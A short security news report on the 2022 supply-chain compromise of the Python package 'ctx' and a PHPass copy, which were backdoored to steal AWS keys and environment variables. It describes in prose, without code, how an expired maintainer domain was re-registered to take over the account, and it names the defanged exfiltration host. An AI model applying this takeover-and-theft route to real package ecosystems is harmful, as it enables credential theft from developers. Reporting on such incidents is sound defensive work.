A popular Python module “ctx” available in the PyPi repository for Phyton software libraries has been compromised in what appears to be yet another supply chain attack.
Ctx is a simple package that allows to access dictionary items using the dot notation, which has about 22,000 downloads per week. Despite its popularity, the original package was last uploaded to PyPi on December 19, 2014. However, on and after May 14, 2022, new versions were uploaded containing an “extra feature” designed to steal secrets like Amazon AWS keys and credentials. The stolen data was sent to a Heroku URL named 'anti-theft-web.herokuapp[.]com.'.
The investigation revealed that the original maintainer's domain name had expired, and the perpetrator registered it on May 14, 2022. With control over the original domain name, the malicious actor could have created a corresponding e-mail to receive a password reset e-mail, remove the old package and upload trojanized versions.
The attackers uploaded three backdoored versions of ctx - 0.1.2, 0.2.2 and 0.2.6. The “new” ctx 0.1.2 version contained code designed to retrieve the AWS access key ID, computer name and the AWS secret access key when a dictionary is created. In the case of ctx v.0.2.6, the attacker attempted to obtain all the environment variables.
Additionally, security researchers have found another compromised library designed to help threat actors to obtain AWS credentials. The library in question is PHPass, a portable PHP password hashing framework. It was found that a compromised version of PHPass uploaded to the Packagist repository also contained the same malicious domain.
Both impacted libraries have been removed from PyPi and GitHub.